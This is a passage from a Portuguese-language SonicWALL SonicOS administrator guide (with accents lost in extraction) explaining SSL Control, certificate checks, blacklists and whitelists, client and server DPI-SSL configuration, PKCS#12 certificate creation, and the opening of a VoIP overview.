preferencial, suportados pelos clientes.
Mtodos de compactao uma lista de mtodos de compactao suportados pelo
cliente (normalmente nulos).
Saudao do servidor a resposta do servidor SSL saudao de cliente. esta parte
da troca SSL que o Controle SSL inspeciona. A saudao de servidor contm a verso da
SSL negociada na sesso, juntamente com informaes de codificao, ID de sesso e
certificado. O prprio certificado de servidor X.509 real, embora seja uma etapa separada
de troca SSL, geralmente comea (e muitas vezes termina) no mesmo pacote da saudao
de servidor.
Certificados os certificados X.509 so marcas digitas inalterveis de aprovao de
segurana eletrnica. Existem quatro caractersticas principais de certificados:
Identificar a entidade de um certificado atravs de um nome comum ou nome distinto
(CN ou DN).
Contm a chave pblica que pode ser usada para criptografar e descriptografar
mensagens entre partes.
Fornece uma assinatura digital da organizao confivel (Autoridade de certificao)
que emitiu o certificado.
Indica o intervalo de datas vlido do certificado.

Entidade a garantia de um certificado identificado por um nome comum (CN). Quando
um cliente navega para um site SSL, tal como https://www.mysonicwall.com, o servidor
envia seu certificado que, em seguida, ser avaliado pelo cliente. O cliente verifica se as
datas do certificado so vlidas, se foi emitido por uma autoridade de certificao confivel
e se o nome comum da entidade corresponde ao nome do host solicitado (ou seja, so
ambos "www.mysonicwall.com"). Embora uma incompatibilidade de nome comum da
entidade apresente um alerta de navegador, nem sempre um sinal certo de fraude. Por
exemplo, se um cliente navegar at https://mysonicwall.com, que determina o mesmo
endereo IP de www.mysonicwall.com, o servidor apresentar seu certificado com o nome
comum da entidade de www.mysonicwall.com. Um alerta ser apresentado ao cliente,
apesar da legitimidade total da conexo.
Autoridade de certificao (CA) uma Autoridade de certificao (CA) uma entidade
confivel que tem capacidade para assinar certificados que se destinam, essencialmente,
validao da identidade da entidade do certificado. As autoridades de certificao
conhecidas incluem VeriSign, Thawte, Equifax e Digital Signature Trust. Em geral, para que
uma autoridade de certificao seja confivel na estrutura SSL, seu certificado deve ser
armazenado em um repositrio confivel, como aqueles usados pela maioria dos
navegadores da Web, sistemas operacionais e ambientes de tempo de execuo. O
repositrio confivel do SonicOS est acessvel na pgina Sistema > Certificados. O
modelo de autoridade de certificao assenta em confiana associativa, em que o cliente
confia em uma autoridade de certificao (por no ter o certificado da autoridade de
certificao em seu repositrio confivel), a autoridade de certificao confia em uma
entidade (por ter emitido um certificado entidade) e, por conseguinte, o cliente pode
confiar na entidade.
Autoridade de certificao no confivel uma autoridade de certificao no confivel
uma autoridade que no est includa no repositrio confivel do cliente. No caso de
Controle SSL, uma autoridade de certificao no confivel qualquer autoridade cujo
certificado no est presente em Sistema > Certificados.
Certificados Autoassinados qualquer certificado em que o nome comum do emissor e
o nome comum da entidade so os mesmos, indicando que o certificado foi autoassinado.
Hospedagem virtual um mtodo empregado por servidores Web para hospedar mais de
um site em um nico servidor. Uma implementao comum de hospedagem virtual a
hospedagem virtual (cabealho do host) baseada em nome, a qual permite que um nico
endereo IP hospede vrios sites. Com a hospedagem virtual do cabealho do host, o
servidor determina o site solicitado, avaliando o cabealho "Host:" enviado pelo cliente. Por
exemplo, www.website1.com e www.website2.com podem determinar 64.41.140.173. Se o
cliente envia um "GET /" junto com "Host: www.website1.com", o servidor pode retornar
contedo correspondente a esse site.
A hospedagem virtual de cabealho do host no geralmente empregada em HTTPS
porque no possvel ler o cabealho do host at que a conexo SSL seja estabelecida,
mas no possvel estabelecer a conexo SSL at o servidor enviar seu Certificado. Uma
vez que o servidor no pode determinar o site que o cliente ir solicitar (tudo o que
conhecido durante o handshake SSL o endereo IP), no possvel determinar o
certificado apropriado para enviar. Enquanto o envio de qualquer certificado pode permitir
o incio do handshake SSL, uma incompatibilidade de nome (entidade) do certificado
acionar um alerta de navegador.

Codificaes fracas codificaes simtricas de criptografia relativamente fracas. As
codificaes so classificadas como fracas quando so inferiores a 64 bits. Na maior parte,
as codificaes de exportao so codificaes fracas. A seguir apresentada uma lista
de codificaes fracas comuns:
Advertncias e avisos
1. Imposio de autoridade de certificao autoassinada e no confivel no caso de
imposio de uma dessas duas opes, altamente recomendvel que voc adicione os
nomes comuns de qualquer dispositivo de rede protegido por SSL em sua organizao
lista branca para garantir que a conectividade a esses dispositivos no seja interrompida.
Por exemplo, o nome da entidade padro de um dispositivo de segurana de rede Dell
SonicWALL "192.168.168.168" e o nome comum padro de dispositivos VPN SSL Dell
SonicWALL "192.168.200.1".
2. Se a sua organizao empregar sua prpria Autoridade de certificao (CA) privada,
altamente recomendvel que voc importe seu certificado de CA privado para o repositrio
Sistema > Certificados, especialmente se voc desejar impor o bloqueio de certificados
emitidos por autoridades de certificao no confiveis. Consulte a seo Sistema >
Certificados do Guia do administrador do SonicOS para obter mais informaes sobre
esse processo.
3. Atualmente, a inspeo do Controle SSL somente realizada no trfego da porta TCP 443.
As negociaes de SSL que ocorrem em portas no padro no sero inspecionadas neste
momento.
4. Fragmentao de saudao do servidor em alguns casos raros, um servidor SSL
fragmentar a saudao do servidor. Se isso ocorrer, a implementao atual do Controle
SSL no decodificar a saudao do servidor. As polticas do Controle SSL no sero
aplicadas sesso SSL e a sesso SSL ser permitida.
5. Manipulao de encerramento de sesso quando o Controle SSL detecta uma
violao de poltica e encerra uma sesso SSL, ele simplesmente terminar a sesso na
camada de TCP. Uma vez que a sesso SSL est em um estado embrionrio neste
momento, no possvel no momento redirecionar o cliente ou fornecer qualquer tipo de
notificao informativa de trmino para o cliente.
6. Precedncia da lista branca a lista branca prevalece em relao a todos os outros
elementos de Controle SSL. Qualquer certificado de servidor SSL que corresponda a uma
entrada na lista branca permitir o avano da sesso SSL, mesmo que outros elementos
da sesso SSL estejam violando a poltica configurada. Isso se deve ao design.
7. Os certificados de CA (conhecidos) pr-instalados 93. O repositrio resultante muito
semelhante ao que pode ser encontrado na maioria dos navegadores. Outras alteraes
relacionadas com certificado:

a. O nmero mximo de certificados de CA foi elevado de 6 a 256.
b. O tamanho mximo de um certificado individual foi elevado de 2048 para 4096.
c. O nmero mximo de entradas na lista negra e na lista branca de 1024 cada.
Configurao de Controle SSL

O Controle SSL est localizado no painel Firewall, na pasta Controle SSL. O Controle SSL
tem uma configurao global, bem como uma configurao por zona. Por padro, o Controle
SSL no est habilitado no nvel global ou nvel de zona. Os controles individuais da pgina
so os seguintes (consulte a seo Conceitos principais do Controle SSL para obter mais
informaes sobre os termos usados abaixo).
Configuraes gerais
Habilitar controle SSL a configurao global do Controle SSL. Isso deve ser habilitado
para que o Controle SSL aplicado s zonas seja eficiente.
Ao
Registrar o evento se for detectada uma violao da poltica de SSL, conforme definido
na seo Configurao abaixo, o evento ser registrado, mas a conexo SSL ser ser
permitida para continuar.
Bloquear a conexo e registrar o evento no caso de uma violao da poltica, a
conexo ser bloqueada e o evento ser registrado.

Configurao
Habilitar lista negra controla a deteco das entradas na lista negra, conforme
configurado na seo Configurar listas abaixo.
Habilitar lista branca controla a deteco das entradas na lista branca, conforme
configurado na seo Configurar listas abaixo. As entradas na lista branca prevalecero
em relao a todas as outras configuraes do Controle SSL.
Detectar certificados expirados controla a deteco de certificados cuja data de incio
antes da hora do sistema atual ou cuja data de trmino depois da hora do sistema atual.
A validao da data depende da hora do sistema do firewall. Garanta que a sua hora do
sistema est corretamente definida, preferencialmente sincronizada com NTP, na pgina
Sistema > Hora.
Detectar SSLv2 controla a deteco de trocas SSLv2. A SSLv2 conhecida por ser
suscetvel a ataques de downgrade de codificao porque no executa a verificao de
integridade no handshake. As melhores prticas recomendam o uso de SSLv3 ou TLS em
seu lugar.
Detectar certificados autoassinados controla a deteco de certificados em que o
emissor e a entidade tm o mesmo nome comum.
Detectar certificados assinados por uma CA no confivel controla a deteco de
certificados em que o certificado do emissor no se encontra no repositrio confivel
Sistema > Certificados do firewall.
Detectar codificaes fracas (<64 bits) controla a deteco de sesses SSL
negociadas com codificaes simtricas inferiores a 64 bits, normalmente indicando o uso
da codificao de exportao.
Detectar resumo de MD5 controla a deteco de certificados que foram criados usando
um hash MD5.
Listas personalizadas
Configurar lista negra e lista branca permite que o administrador defina cadeias de
caracteres para correspondncia de nomes comuns em certificados SSL. As entradas
diferenciam maisculas de minsculas e sero usadas na forma de correspondncia de
padres, por exemplo:
Entrada Corresponder No corresponder

sonicwall.com https://www.sonicwall.com, https://www.sonicwall.de
https://csm.demo.sonicwall.com,
https://mysonicwall.com,
https://supersonicwall.computers.org,
https://67.115.118.87 a
prox https://proxify.org, https://www.freeproxy.ru c
https://www.proxify.org,
https://megaproxy.com,
https://1070652204 b
a.67.115.118.67 , no momento, o endereo IP que determina sslvpn.demo.sonicwall.com e esse site usa um certificado emitido
para sslvpn.demo.sonicwall.com. Isso resultar em uma correspondncia para "sonicwall.com" desde que a correspondncia
ocorra com base no nome comum no certificado.
b.Esta a notao decimal do endereo IP 63.208.219.44, cujo certificado emitido para www.megaproxy.com.
c.www.freeproxy.ru no corresponder a "prox", pois o nome comum no certificado que apresentado atualmente por este site
um certificado autoassinado emitido para "-". Porm, isso pode ser facilmente bloqueado atravs da habilitao do
controle de certificados de CA autoassinados ou no confiveis.

Para configurar a lista negra e a lista branca, clique no boto Configurar para exibir a janela
seguinte.
As entradas podem ser adicionadas, editadas e excludas com os botes sob cada janela de
lista.
Nota A correspondncia de lista ser baseada no nome comum da entidade no certificado

apresentado na troca SSL, no no URL (recurso) solicitado pelo cliente.
As alteraes a qualquer uma das configuraes de Controle SSL no afetaro conexes

estabelecidas no momento; somente novas trocas SSL que ocorrem aps a confirmao de
alterao sero inspecionadas e afetadas.
Habilitar o Controle de SSL em zonas

Depois de o Controle SSL ter sido globalmente habilitado e as opes desejadas terem sido
configuradas, o Controle de SSL deve ser habilitado em uma ou mais zonas. Quando o
Controle SSL est habilitado na zona, o firewall procura saudaes de cliente enviadas por
clientes nessa zona atravs do firewall que acionar a inspeo. O firewall procura, em
seguida, a saudao do servidor e o certificado que enviado em resposta para avaliao
comparativamente poltica configurada. A habilitao do Controle SSL na zona de LAN, por
exemplo, inspecionar todo o trfego SSL iniciado por clientes na LAN para qualquer zona de
destino.

Nota Se voc estiver ativando o Controle SSL em uma zona (por exemplo, a zona de LAN) onde
h clientes que acessaro um servidor SSL em outra zona conectada ao firewall (por
exemplo, a zona de DMZ), recomendvel que voc adicione o nome comum da entidade
do certificado do servidor lista branca para garantir o acesso confivel contnuo.
Para habilitar o controle SSL em uma zona, navegue at a pgina Rede > Zonas e selecione
o cone de configurao da zona desejada. Na janela Editar zona, marque a caixa de seleo
Habilitar controle SSL e clique em OK. Todas as novas conexes SSL iniciadas a partir dessa
zona estaro agora sujeitas a inspeo.
Eventos do Controle SSL

Os eventos de registro incluiro o nome de usurio do cliente na seo de notas (no
mostrada) se o usurio se conectar manualmente ou se for identificado por meio de CIA/
conexo nica. Se a identidade do usurio no estiver disponvel, a nota indicar que o usurio
No identificado.
# Mensagem do evento Condies quando ele ocorre

1 Controle SSL: Certificado com data invlida A data de incio do certificado antes da hora do
sistema ou a sua data de trmino posterior hora
do sistema.
2 Controle SSL: Certificate chain not complete O certificado foi emitido por uma autoridade de
[Controle SSL: cadeia de certificados certificao intermediria com uma autoridade de
incompleta] certificao confivel de nvel superior, mas o
servidor SSL no apresentou o certificado
intermedirio. Esse evento de registro informativo
e no afeta a conexo SSL.
3 Controle SSL: Self-signed certificate O certificado autoassinado (os nomes comuns do
[Controle SSL: certificado autoassinado] emissor e da entidade correspondem).
4 Controle SSL: Untrusted CA O certificado foi emitido por uma autoridade de
[Controle SSL: CA no confivel] certificao que no se encontra no repositrio
Sistema > Certificados do firewall.
5 Controle SSL: Website found in blacklist O nome comum da entidade correspondeu a um
[Controle SSL: site da Web encontrado na lista padro inserido na lista negra.
negra]
6 Controle SSL: Weak cipher being used A codificao simtrica sendo negociada inferior a
[Controle SSL: cifra fraca sendo usada] 64 bits.
7 Consulte #2 Consulte #2.
8 Controle SSL: Failed to decode Server Hello A saudao do servidor proveniente do servidor
[Controle SSL: falha ao decodificar servidor SSL indecifrvel. Tambm ocorre quando o
Hello] certificado e a saudao do servidor esto em
pacotes diferentes, como o caso da conexo a um
servidor SSL em um dispositivo SonicWALL. Esse
evento de registro informativo e no afeta a
conexo SSL.

# Mensagem do evento Condies quando ele ocorre
9 Controle SSL: Website found in whitelist O nome comum da entidade (normalmente um site
[Controle SSL: site da Web encontrado na lista da Web) correspondeu a um padro inserido na lista
branca] branca. As entradas da lista branca so sempre
permitidas, mesmo se houver outras violaes de
poltica na negociao, como SSLv2 ou
codificaes fracas.
10 Controle SSL: HTTPS via SSLv2 A sesso SSL estava sendo negociada usando
SSLv2, a qual conhecida por ser suscetvel a
determinados ataques a intermedirios. As
melhores prticas recomendam o uso de SSLv3 ou
TLS em vez disso.

Parte 10
DPI-SSL
| 757
Captulo 49
Definir configuraes DPI-SSL de cliente
DPI-SSL > SSL do cliente

Viso geral de DPI-SSL na pgina 759
Configurar o DPI-SSL do cliente na pgina 760
Viso geral de DPI-SSL

O Deep Packet Inspection of Secure Socket Layer (DPI-SSL) estende a tecnologia Deep
Packet Inspection da SonicWALL para permitir a inspeo de trfego HTTPS criptografado e
outro trfego baseado em SSL. O trfego SSL descriptografado de forma transparente,
verificado em busca de ameaas e, em seguida, novamente criptografado e enviado para o
respectivo destino se no for detectada nenhuma ameaa ou vulnerabilidade. O DPI-SSL
fornece segurana adicional, controle de aplicativos e preveno contra vazamento de dados
para analisar trfego HTTPS criptografado e outro trfego baseado em SSL.
Os seguintes servios de segurana e os recursos so capazes de utilizar DPI-SSL:
Antivrus do gateway
Preveno de intruso
Firewall do aplicativo
O DPI-SSL tem dois cenrios de implantao principais:

DPI-SSL do cliente: Usado para inspecionar o trfego HTTPS quando os clientes na LAN
do firewall acessam contedo localizado na WAN.
DPI-SSL do servidor: Usado para inspecionar o trfego HTTPS quando clientes remotos
estabelecem uma conexo por meio de WAN para acessar o contedo localizado na LAN
do firewall.
Definir configuraes DPI-SSL de cliente | 759

O recurso DPI-SSL est disponvel. A tabela seguinte mostra quais as plataformas que
suportam DPI-SSL e o nmero mximo de conexes simultneas em que o dispositivo pode
executar a inspeo de DPI-SSL.
Modelo de hardware Conexes simultneas mximas de DPI-SSL

SuperMassive 9000 Series 8000
NSA 6600 3000
NSA 5600 2000
NSA 4600 350
NSA 3600 250
NSA 2600 250
Configurar o DPI-SSL do cliente

O cenrio de implantao do DPI-SSL do cliente normalmente usado para inspecionar o
trfego HTTPS quando clientes na LAN procuram contedo localizado na WAN. No cenrio de
DPI-SSL do cliente, o firewall normalmente no detm os certificados e as chaves privadas
para o contedo que est inspecionando. Depois de o dispositivo realizar uma inspeo de
DPI-SSL, ele grava novamente o certificado enviado pelo servidor remoto e assina este
certificado recm-gerado com o certificado especificado na configurao de DPI-SSL do
cliente. Por padro, este o certificado de autoridade de certificado (CA) do firewall ou um
certificado diferente pode ser especificado. Os usurios devem ser instrudos para adicionar o
certificado sua lista confivel do navegador para evitar erros de confiabilidade do certificado.
As sees a seguir descrevem como configurar o DPI-SSL do cliente:
Definir configuraes gerais de DPI-SSL do cliente na pgina 760
Configurar a lista de incluso/excluso na pgina 761
Selecionar a autoridade de nova assinatura de certificado na pgina 762
Filtragem de contedo na pgina 763
Definir configuraes gerais de DPI-SSL do cliente
Para habilitar a inspeo de DPI-SSL do cliente, execute as seguintes etapas:

1. Navegue para a pgina DPI-SSL > SSL do cliente.
2. Marque a caixa de seleo Habilitar inspeo de SSL.

3. Selecione com quais dos seguintes servios deve ser realizada a inspeo: Preveno de
intruso, Antivrus do gateway, Anti-spyware no gateway, Regras de aplicativos e
Filtro de contedo.
4. Clique em Aceitar.
Configurar a lista de incluso/excluso

Por padro, o DPI-SSL aplica-se a todo o trfego no dispositivo quando ele est habilitado.
Voc pode configurar uma lista de incluso/excluso para personalizar o trfego ao qual ser
aplicada a inspeo de DPI-SSL. A lista de incluso/excluso permite especificar alguns
objetos, grupos ou nomes de host. Em implementaes que processam uma grande
quantidade de trfego, ela pode ser til para excluir fontes confiveis para reduzir o impacto
da CPU de DPI-SSL e para impedir que o dispositivo atinja o nmero mximo de conexes
simultneas de DPI-SSL inspecionado.
A seo Incluso/Excluso da pgina SSL do cliente contm quatro opes para especificar
a lista de incluses:
Na linha Grupo/Objeto de endereo, selecione um objeto de endereo ou grupo a partir
do menu suspenso Excluir para dispens-lo da inspeo de DPI-SSL.
Na linha Grupo/Objeto de servio, selecione um objeto de servio ou grupo a partir do
menu suspenso Excluir para dispens-lo da inspeo de DPI-SSL.
Na linha Grupo/Objeto de usurio, selecione um objeto de usurio ou grupo a partir do
Dica O menu suspenso Incluir pode ser usado para ajustar a lista de excluso especificada. Por
exemplo, selecionar o objeto de endereo Remote-office-California no menu suspenso
Excluir e o objeto de endereo Remote-office-Oakland no menu suspenso Incluir.
A seo Excluses de nome comum usada para adicionar nomes de domnio lista de
excluso. Para adicionar um nome de domnio, digite-o na caixa de texto e clique em
Adicionar.
Clique em Aplicar no topo da pgina para confirmar a configurao.

Selecionar a autoridade de nova assinatura de certificado
Por padro, o DPI-SSL usa o Certificado de CA de DPI-SSL da SonicWALL padro para
assinar novamente o trfego que foi inspecionado. Opcionalmente, os usurios podem
especificar se outro certificado ser usado. Para usar um certificado personalizado, voc deve
importar primeiro o certificado para o firewall:
1. Navegue at a pgina Sistema > Certificados.
2. Clique em Importar certificado.
3. Selecione a opo Importar um certificado de usurio final local com chave privada
de um arquivo codificado PKCS#12 (.p12 ou .pfx).
4. Escolha a senha e clique em Importar.
Depois de o certificado ser importado, voc deve configur-lo na pgina de DPI-SSL do cliente:
1. Navegue para a pgina DPI-SSL > SSL do cliente.
2. Role para baixo, para a seo Autoridade de nova assinatura de certificado e selecione
o certificado no menu suspenso.
3. Clique em Aplicar.
Para obter ajudar na criao de arquivos formatados PKCS-12, consulte Criar arquivo de
certificado formatado PKCS-12 na pgina 762.
Adicionar atributo confivel ao navegador

Na seo anterior foi descrita a forma de configurao de uma autoridade de nova assinatura
de certificado. Para que a autoridade de nova assinatura de certificado assine novamente com
xito certificados, os navegadores devem confiar nesta autoridade de certificado. Tal atributo
confivel pode ser estabelecido atravs da importao do certificado de nova assinatura na
lista de CA confivel do navegador.
Internet Explorer: V para Ferramentas > Opes da Internet, clique na guia Contedo
e clique em Certificados. Clique na guia Autoridades de certificao raiz confiveis e
clique em Importar. O Assistente de importao do certificado orientar voc durante
a importao do certificado.
Firefox: V para Ferramentas > Opes, clique na guia Avanado e, em seguida, na guia
Criptografia. Clique em Visualizar certificados, selecione a guia Autoridades e clique
em Importar. Selecione o arquivo de certificado, certifique-se de que a caixa de seleo
Confiar nesta CA para identificar sites esteja marcada e clique em OK.
Mac: Clique duas vezes no arquivo de certificado, selecione Menu do conjunto de
chaves, clique em ncoras X509 e, em seguida, clique em OK. Insira o nome de usurio
e a senha do sistema e clique em OK.
Criar arquivo de certificado formatado PKCS-12

O arquivo de certificado formatado PKCS12 pode ser criado usando o sistema Linux com
OpenSSL. Para criar um arquivo de certificado formatado PKCS-12, necessrio ter dois
componentes principais do certificado:
Chave privada (normalmente um arquivo com a extenso .key ou a chave da palavra no
nome do arquivo)
Certificado com uma chave pblica (normalmente um arquivo com a extenso .crt ou o
certificado da palavra como parte do nome do arquivo).
Por exemplo, o servidor HTTP Apache em Linux tem sua chave privada e seu certificado nas
seguintes localizaes:
/etc/httpd/conf/ssl.key/server.key
/etc/httpd/conf/ssl.crt/server.crt

Com esses dois arquivos disponveis, execute o seguinte comando:
openssl pkcs12 -export -out out.p12 -inkey server.key -in server.crt
Neste exemplo, out.p12 se tornar o arquivo de certificado formatado PKCS-12 e server.key

e server.crt sero a chave privada formatada PEM e o arquivo de certificado, respectivamente.
Aps o comando acima, ser solicitada a senha para proteger/criptografar o arquivo. Depois
de a senha ser escolhida, a criao de um arquivo de certificado formatado PKCS-12
concluda e pode ser importado para o dispositivo UTM.
Exemplos de DPI-SSL do cliente

As sees a seguir
Filtragem de contedo na pgina 763
Regras de aplicativos na pgina 763
Para executar a filtragem de contedo da SonicWALL no trfego baseado em HTTPS e SSL
usando DPI-SSL, execute as seguintes etapas:
1. Navegue at a pgina DPI-SSL > SSL do cliente
2. Marque a caixa de seleo Habilitar inspeo de SSL e a caixa de seleo Filtro de
contedo.
4. Navegue at a pgina Servios de segurana > Filtro de contedo e clique no boto
Configurar.
5. Desmarque a caixa de seleo Habilitar filtragem de contedo HTTPS com base em IP.
6. Selecione as categorias apropriadas a bloquear.
8. Navegue at um site bloqueado usando o protocolo HTTPS para verificar se ele est
adequadamente bloqueado.
Nota Para filtragem de contedo atravs de DPI-SSL, quando o acesso HTTPS bloqueado pela
primeira vez, exibida uma pgina em branco. Se a pgina for atualizada, o usurio ver a
pgina de bloqueio do firewall.
Habilite a caixa de seleo Regras de aplicativos na tela DPI-SSL do cliente e habilite as regras
de aplicativos na tela Regras de aplicativos > Polticas.
1. Navegue at a pgina DPI-SSL > SSL do cliente
2. Marque a caixa de seleo Habilitar inspeo de SSL e a caixa de seleo Regras de
aplicativos.
4. Navegue at a pgina Regras de aplicativos > Polticas.
5. Habilite Regras de aplicativos.
6. Configure uma Poltica de cliente HTTP para bloquear o navegador Microsoft Internet
Explorer.

7. Selecione Bloquear pgina como uma ao da poltica. Clique em Aplicar.
8. Acesse qualquer site usando o protocolo HTTPS com o Internet Explorer e verifique se ele
est bloqueado.
O DPI-SSL tambm suporta gerenciamento de largura de banda ao nvel dos aplicativos
atravs de tneis SSL. As polticas de gerenciamento de largura de banda HTTP de regras de
aplicativos tambm se aplicam ao contedo que acessado atravs de HTTPS quando o DPI-
SSL est habilitado para regras de aplicativos.

Captulo 50
Definir configuraes DPI-SSL do
servidor
DPI-SSL > SSL do servidor

Viso geral de DPI-SSL na pgina 765
Definir configuraes DPI-SSL do servidor na pgina 766
Viso geral de DPI-SSL

O Deep Packet Inspection of Secure Socket Layer (DPI-SSL) estende a tecnologia Deep
Packet Inspection da SonicWALL para permitir a inspeo de trfego HTTPS criptografado e
outro trfego baseado em SSL. O trfego SSL descriptografado de forma transparente,
verificado em busca de ameaas e, em seguida, novamente criptografado e enviado para o
respectivo destino se no for detectada nenhuma ameaa ou vulnerabilidade. O DPI-SSL
fornece segurana adicional, controle de aplicativos e preveno contra vazamento de dados
para analisar trfego HTTPS criptografado e outro trfego baseado em SSL.
Os seguintes servios de segurana e os recursos so capazes de utilizar DPI-SSL:
Antivrus do gateway
Preveno de intruso
Firewall do aplicativo
O DPI-SSL tem dois cenrios de implantao principais:

DPI-SSL do cliente: Usado para inspecionar o trfego HTTPS quando os clientes na LAN
do firewall acessam contedo localizado na WAN.
DPI-SSL do servidor: Usado para inspecionar o trfego HTTPS quando clientes remotos
estabelecem uma conexo por meio de WAN para acessar o contedo localizado na LAN
do firewall.
Definir configuraes DPI-SSL do servidor | 765

O recurso DPI-SSL est disponvel. A tabela seguinte mostra quais as plataformas que
suportam DPI-SSL e o nmero mximo de conexes simultneas em que o dispositivo pode
executar a inspeo de DPI-SSL.
Modelo de hardware Conexes simultneas mximas de DPI-SSL

SuperMassive 9000 Series 8000
NSA 6600 3000
NSA 5600 2000
NSA 4600 350
NSA 3600 250
NSA 2600 250
Definir configuraes DPI-SSL do servidor

O cenrio de implantao de DPI-SSL do servidor usado normalmente para inspecionar o
trfego HTTPS quando clientes remotos estabelecem uma conexo por meio de WAN para
acessar o contedo localizado na LAN do firewall. O DPI-SSL do servidor permite ao usurio
configurar emparelhamentos de um objeto de endereo e certificado. Quando o dispositivo
detecta conexes SSL ao objeto de endereo, ele apresenta o certificado emparelhado e
negocia SSL com o cliente conectado.
Depois disso, se o emparelhamento definir o servidor para "cleartext", ento realizada uma
conexo TCP padro ao servidor na porta original (remapeamento ps-NAT). Se o
emparelhamento no estiver definido para cleartext, negociada uma conexo SSL ao
servidor. Isso permite uma criptografia de ponta a ponta da conexo.
Nesse cenrio de implementao, o proprietrio do firewall possui os certificados e as chaves
privadas dos servidores de contedo de origem. O administrador deve importar o certificado
original do servidor para o dispositivo UTM e criar um endereo IP de servidor apropriado nos
mapeamentos de certificado de servidor na interface do usurio de DPI-SSL do servidor.
As sees a seguir descrevem como configurar o DPI-SSL do servidor:
Definir configuraes gerais do DPI-SSL do servidor na pgina 767
Configurar a lista de excluso na pgina 767
Configurar emparelhamentos de servidor a certificado na pgina 768
Descarregamento de SSL na pgina 768

Definir configuraes gerais do DPI-SSL do servidor
Para habilitar a inspeo do DPI-SSL do servidor, execute as seguintes etapas:
Etapa 1 Navegue at a pgina DPI-SSL > SSL do servidor.

Etapa 2 Marque a caixa de seleo Habilitar inspeo de SSL.
Etapa 3 Selecione com quais dos seguintes servios deve ser realizada a inspeo: Preveno de
intruso, Antivrus do gateway, Anti-spyware do gateway e Firewall de aplicativos.
Etapa 5 Role para baixo at a seo Servidores SSL para configurar o servidor ou os servidores aos
quais a inspeo de DPI-SSL ser aplicada. Consulte Configurar emparelhamentos de servidor
a certificado na pgina 768.
Configurar a lista de excluso

Por padro, o DPI-SSL aplica-se a todo o trfego no dispositivo quando ele est habilitado.
Voc pode configurar uma lista de incluso/excluso para personalizar o trfego ao qual ser
aplicada a inspeo de DPI-SSL. A lista de incluso/excluso permite especificar alguns
objetos, grupos ou nomes de host. Em implementaes que processam uma grande
quantidade de trfego, ela pode ser til para excluir fontes confiveis para reduzir o impacto
da CPU de DPI-SSL e para impedir que o dispositivo atinja o nmero mximo de conexes
simultneas de DPI-SSL inspecionado.

A seo Incluso/Excluso da pgina SSL do servidor contm duas opes para especificar
a lista de incluses:
Na linha Grupo/Objeto de endereo, selecione um objeto de endereo ou grupo a partir
do menu suspenso Excluir para dispens-lo da inspeo de DPI-SSL.
Na linha Grupo/Objeto de usurio, selecione um objeto de usurio ou grupo a partir do
Nota O menu suspenso Incluir pode ser usado para ajustar a lista de excluso
especificada. Por exemplo, selecionar o objeto de endereo Remote-office-
California no menu suspenso Excluir e o objeto de endereo Remote-office-
Oakland no menu suspenso Incluir.
Configurar emparelhamentos de servidor a certificado

A inspeo de DPI-SSL do servidor exige que voc especifique o certificado que ser usado
para assinar trfego para cada servidor cujo trfego ser submetido inspeo de DPI-SSL.
Para configurar um emparelhamento de servidor a certificado, execute as seguintes etapas:
1. Navegue at a pgina DPI-SSL > SSL do servidor e role para baixo at a seo
Servidores SSL.
2. Clique no boto Adicionar.
3. No menu suspenso Grupo/Objeto de endereo, selecione o objeto de endereo ou grupo

do servidor ou dos servidores aos quais voc deseja aplicar a inspeo de DPI-SSL.
4. No menu suspenso Certificado SSL, selecione o certificado que ser usado para assinar
o trfego do servidor. Para obter mais informaes sobre a importao de um novo
certificado no dispositivo, consulte Selecionar a autoridade de nova assinatura de
certificado na pgina 762. Para obter informaes sobre a criao de um certificado,
consulte Criar arquivo de certificado formatado PKCS-12 na pgina 762.
5. Marque a caixa de seleo Cleartext para habilitar o descarregamento de SSL. Para obter
mais informaes, consulte Descarregamento de SSL na pgina 768.
6. Clique em Adicionar.
Descarregamento de SSL
Quando adicionar os pares de servidor a certificado, a opo cleartext fica disponvel. Esta
opo indica que a parte da conexo TCP entre o dispositivo UTM e o servidor local estar
desprotegida sem camada SSL, permitindo assim que o processamento de SSL seja
descarregado do servidor pelo dispositivo.

Observe que para tal configurao funcionar corretamente, necessrio criar uma poltica de
NAT na pgina Rede > Polticas de NAT para mapear o trfego destinado ao servidor de
descarregamento de uma porta SSL para uma porta no SSL. Por exemplo, no caso de o
trfego HTTPS estar sendo usado com descarregamento SSL, necessrio criar uma poltica
de NAT de entrada que efetue o remapeamento do trfego da porta 443 porta 80 para uma
operao correta.

Parte 11
VoIP
| 771
Captulo 51
Configurando o suporte de VoIP
VoIP
Esta seo apresenta duas sees principais:
Viso geral de VoIP na pgina 773
Configuraes de VoIP na pgina 783
Viso geral de VoIP

Esta seo fornece uma viso geral de VoIP. Ela contm as seguintes sees:
O que VoIP? na pgina 773
Segurana VoIP na pgina 774
Protocolos de VoIP na pgina 775
Recursos de VoIP da SonicWALL na pgina 776
O que VoIP?
Voz sobre IP (VoIP) um termo geral para um conjunto de tecnologias que permitem que o
trfego de voz seja feito atravs de redes de Protocolo de Internet (IP). VoIP transfere os fluxos
de voz de chamadas de udio em pacotes de dados, em vez de comunicaes de voz
comutadas por circuito tradicional e analgico usadas pela rede telefnica pblica comutada
(PSTN).
VoIP a fora principal que direciona a convergncia de redes e telecomunicaes
combinando telefonia de voz e dados em um nico sistema de rede IP integrado. VoIP tudo
sobre economia de custos para empresas por meio de eliminao de infra-estruturas
redundantes dispendiosas e de taxas de uso de telecomunicaes, enquanto tambm oferece
recursos de gerenciamento aprimorados e recursos de servios de chamadas.
Configurando o suporte de VoIP | 773

Segurana VoIP
As empresas implementam tecnologias VoIP em um esforo para diminuir os custos de
comunicao e ampliar os servios corporativos de voz para uma fora de trabalho distribuda
face os riscos de segurana associados convergncia de redes de voz e de dados. A
segurana VoIP e a integridade da rede so uma parte essencial de qualquer implantao de
VoIP.
As mesmas ameaas de segurana que as redes de dados infestam hoje so herdadas por
VoIP, mas a adio de VoIP como um aplicativo na rede torna essas ameaas ainda mais
perigosas. Adicionando componentes de VoIP na rede, voc tambm est adicionando novos
requisitos de segurana.
VoIP abrange um nmero de padres complexos que deixe a porta aberta para bugs e
vulnerabilidades na implementao de software. Os mesmos tipos de bugs e vulnerabilidades
que dificultam cada sistema operacional e o aplicativo disponvel hoje tambm se aplicam ao
equipamento de VoIP. Muitos dos dispositivos de gateway e servidores de chamada VoIP de
hoje so criados em sistemas operacionais Windows e Linux vulnerveis.
Requisitos de firewall para VoIP

VoIP mais complicado do que os aplicativos padro baseados em TCP/UDP. Devido as
complexidades de protocolos e sinalizao VoIP, bem como inconsistncias que so
apresentadas quando um firewall modifica o endereo de origem e as informaes de porta de
